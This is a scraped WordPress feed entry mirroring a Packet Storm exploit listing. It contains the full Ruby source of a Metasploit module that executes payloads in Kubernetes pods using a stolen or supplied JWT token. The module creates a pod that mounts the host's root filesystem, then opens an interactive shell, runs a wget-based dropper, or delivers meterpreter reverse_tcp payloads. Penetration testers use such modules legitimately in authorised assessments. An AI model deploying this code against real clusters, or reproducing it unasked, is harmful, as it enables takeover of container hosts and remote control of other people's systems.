{“lastseen”:”2025-08-28T16:37:08″,”description”:”This…………………………………………………”,”published”:”2025-08-28T00:00:00″,”modified”:”2025-08-28T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Kubernetes Authenticated Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:208944″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# -*- coding: binary -*-\\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit\\n Rank = ManualRanking\\n \\n include Msf::Exploit::Retry\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::CmdStager\\n include Msf::Exploit::Remote::HTTP::Kubernetes\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Kubernetes authenticated code execution’,\\n ‘Description’ =\\u003e %q{\\n Execute a payload within a Kubernetes pod.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘alanfoster’,\\n ‘Spencer McIntyre’\\n ],\\n ‘References’ =\\u003e [\\n ],\\n ‘Notes’ =\\u003e {\\n ‘SideEffects’ =\\u003e [\\n ARTIFACTS_ON_DISK, # the Linux Dropper target uses the command stager which writes to disk\\n CONFIG_CHANGES, # the Kubernetes configuration is changed if a new pod is created\\n IOC_IN_LOGS # a log event is generated if a new pod is created\\n ],\\n ‘Reliability’ =\\u003e [ REPEATABLE_SESSION ],\\n ‘Stability’ =\\u003e [ CRASH_SAFE ]\\n },\\n ‘DefaultOptions’ =\\u003e {\\n ‘SSL’ =\\u003e true\\n },\\n ‘Targets’ =\\u003e [\\n [\\n ‘Interactive WebSocket’,\\n {\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Platform’ =\\u003e ‘unix’,\\n ‘Type’ =\\u003e :nix_stream,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘cmd\/unix\/interact’\\n },\\n ‘Payload’ =\\u003e {\\n ‘Compat’ =\\u003e {\\n ‘PayloadType’ =\\u003e ‘cmd_interact’,\\n ‘ConnectionType’ =\\u003e ‘find’\\n }\\n }\\n }\\n ],\\n [\\n ‘Unix Command’,\\n {\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Platform’ =\\u003e ‘unix’,\\n ‘Type’ =\\u003e :nix_cmd\\n }\\n ],\\n [\\n ‘Linux Dropper’,\\n {\\n ‘Arch’ =\\u003e [ARCH_X86, ARCH_X64],\\n ‘Platform’ =\\u003e ‘linux’,\\n ‘Type’ =\\u003e :nix_dropper,\\n ‘DefaultOptions’ =\\u003e {\\n ‘CMDSTAGER::FLAVOR’ =\\u003e ‘wget’,\\n ‘PAYLOAD’ =\\u003e ‘linux\/x64\/meterpreter\/reverse_tcp’\\n }\\n }\\n ],\\n [\\n ‘Python’,\\n {\\n ‘Arch’ =\\u003e [ARCH_PYTHON],\\n ‘Platform’ =\\u003e ‘python’,\\n ‘Type’ =\\u003e :python,\\n ‘PAYLOAD’ =\\u003e ‘python\/meterpreter\/reverse_tcp’\\n }\\n ]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2021-10-01’,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Platform’ =\\u003e [ ‘linux’, ‘unix’ ],\\n ‘SessionTypes’ =\\u003e [ ‘meterpreter’ ]\\n )\\n )\\n \\n register_options(\\n [\\n Opt::RHOSTS(nil, false),\\n Opt::RPORT(nil, false),\\n Msf::OptInt.new(‘SESSION’, [ false, ‘An optional session to use for configuration’ ]),\\n OptString.new(‘TOKEN’, [ false, ‘The JWT token’ ]),\\n OptString.new(‘POD’, [ false, ‘The pod name to execute in’ ]),\\n OptString.new(‘NAMESPACE’, [ false, ‘The Kubernetes namespace’, ‘default’ ]),\\n OptString.new(‘SHELL’, [true, ‘The shell to use for execution’, ‘sh’ ]),\\n ]\\n )\\n \\n register_advanced_options(\\n [\\n OptString.new(‘PodImage’, [ false, ‘The image from which to create the pod’ ]),\\n OptInt.new(‘PodReadyTimeout’, [ false, ‘The maximum amount time to wait for the pod to be created’, 40 ]),\\n ]\\n )\\n end\\n \\n def pod_name\\n @pod_name || datastore[‘POD’]\\n end\\n \\n def create_pod\\n if datastore[‘PodImage’].blank?\\n image_names = @kubernetes_client.list_pods(namespace).fetch(:items, []).flat_map { |pod| pod.dig(:spec, :containers).map { |container| container[:image] } }.uniq\\n fail_with(Failure::NotFound, ‘An image could not be found from which to create a pod, set the PodImage option’) if image_names.empty?\\n else\\n image_names = [ datastore[‘PodImage’] ]\\n end\\n \\n ready = false\\n image_names.each do |image_name|\\n print_status(\\”Using image: #{image_name}\\”)\\n \\n random_identifiers = Rex::RandomIdentifier::Generator.new({\\n first_char_set: Rex::Text::LowerAlpha,\\n char_set: Rex::Text::LowerAlpha + Rex::Text::Numerals\\n })\\n new_pod_definition = {\\n apiVersion: ‘v1’,\\n kind: ‘Pod’,\\n metadata: {\\n name: random_identifiers[:pod_name],\\n labels: {}\\n },\\n spec: {\\n containers: [\\n {\\n name: random_identifiers[:container_name],\\n image: image_name,\\n command: [‘\/bin\/sh’, ‘-c’, ‘exec tail -f \/dev\/null’],\\n volumeMounts: [\\n {\\n mountPath: ‘\/host_mnt’,\\n name: random_identifiers[:volume_name]\\n }\\n ]\\n }\\n ],\\n volumes: [\\n {\\n name: random_identifiers[:volume_name],\\n hostPath: {\\n path: ‘\/’\\n }\\n }\\n ]\\n }\\n }\\n new_metadata = @kubernetes_client.create_pod(new_pod_definition, namespace)[:metadata]\\n \\n @pod_name = random_identifiers[:pod_name]\\n print_good(\\”Pod created: #{pod_name}\\”)\\n \\n print_status(‘Waiting for the pod to be ready…’)\\n ready = retry_until_truthy(timeout: datastore[‘PodReadyTimeout’]) do\\n pod = @kubernetes_client.get_pod(pod_name, namespace)\\n pod_status = pod[:status]\\n next if pod_status == ‘Failure’\\n \\n container_statuses = pod_status[:containerStatuses]\\n next unless container_statuses\\n \\n ready = container_statuses.any? { |status| status[:ready] }\\n ready\\n rescue Msf::Exploit::Remote::HTTP::Kubernetes::Error::ServerError =\\u003e e\\n elog(e)\\n false\\n end\\n \\n if ready\\n report_note(\\n type: ‘kubernetes.pod’,\\n host: rhost,\\n port: rport,\\n data: {\\n pod: new_metadata.slice(:name, :namespace, :uid, :creationTimestamp),\\n imageName: image_name\\n },\\n update: :unique_data\\n )\\n \\n break\\n end\\n \\n print_error(‘The pod failed to start within the expected timeframe’)\\n \\n begin\\n @kubernetes_client.delete_pod(@pod_name, namespace)\\n rescue StandardError\\n print_error(‘Failed to delete the pod’)\\n end\\n end\\n \\n fail_with(Failure::Unknown, ‘Failed to create a new pod’) unless ready\\n end\\n \\n def exploit\\n if session\\n print_status(\\”Routing traffic through session: #{session.sid}\\”)\\n configure_via_session\\n end\\n \\n validate_configuration!\\n \\n @kubernetes_client = Msf::Exploit::Remote::HTTP::Kubernetes::Client.new({ http_client: self, token: api_token })\\n \\n create_pod if pod_name.blank?\\n \\n case target[‘Type’]\\n when :nix_stream\\n # Setting tty =\\u003e true allows the shell prompt to be seen but it also causes commands to be echoed back\\n websocket = @kubernetes_client.exec_pod(\\n pod_name,\\n datastore[‘Namespace’],\\n datastore[‘Shell’],\\n ‘stdin’ =\\u003e true,\\n ‘stdout’ =\\u003e true,\\n ‘stderr’ =\\u003e true,\\n ‘tty’ =\\u003e false\\n )\\n \\n print_good(‘Successfully established the WebSocket’)\\n channel = Msf::Exploit::Remote::HTTP::Kubernetes::Client::ExecChannel.new(websocket)\\n handler(channel.lsock)\\n when :nix_cmd\\n execute_command(payload.encoded)\\n when :nix_dropper\\n execute_cmdstager\\n else\\n execute_command(payload.encoded)\\n end\\n rescue Rex::Proto::Http::WebSocket::ConnectionError =\\u003e e\\n res = e.http_response\\n fail_with(Failure::Unreachable, e.message) if res.nil?\\n fail_with(Failure::NoAccess, ‘Insufficient Kubernetes access’) if res.code == 401 || res.code == 403\\n fail_with(Failure::Unknown, e.message)\\n else\\n report_service(host: rhost, port: rport, proto: ‘tcp’, name: ‘kubernetes’)\\n end\\n \\n def execute_command(cmd, _opts = {})\\n case target[‘Platform’]\\n when ‘python’\\n command = [datastore[‘Shell’], ‘-c’, \\”exec $(which python || which python3 || which python2) -c #{Shellwords.escape(cmd)}\\”]\\n else\\n command = [datastore[‘Shell’], ‘-c’, cmd]\\n end\\n \\n result = @kubernetes_client.exec_pod_capture(\\n pod_name,\\n datastore[‘Namespace’],\\n command,\\n ‘stdin’ =\\u003e false,\\n ‘stdout’ =\\u003e true,\\n ‘stderr’ =\\u003e true,\\n ‘tty’ =\\u003e false\\n ) do |stdout, stderr|\\n print_line(stdout.strip) unless stdout.blank?\\n print_line(stderr.strip) unless stderr.blank?\\n end\\n \\n fail_with(Failure::Unknown, ‘Failed to execute the command’) if result.nil?\\n \\n status = result\\u0026.dig(:error, ‘status’)\\n fail_with(Failure::Unknown, \\”Status: #{status || ‘Unknown’}\\”) unless status == ‘Success’\\n end\\n end”,”sourceHref”:”https:\/\/packetstorm.news\/download\/208944″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/208944\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-28T16:37:08″,”description”:”This…………………………………………………”,”published”:”2025-08-28T00:00:00″,”modified”:”2025-08-28T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Kubernetes Authenticated Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:208944″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# -*- coding: binary -*-\\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-15172","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n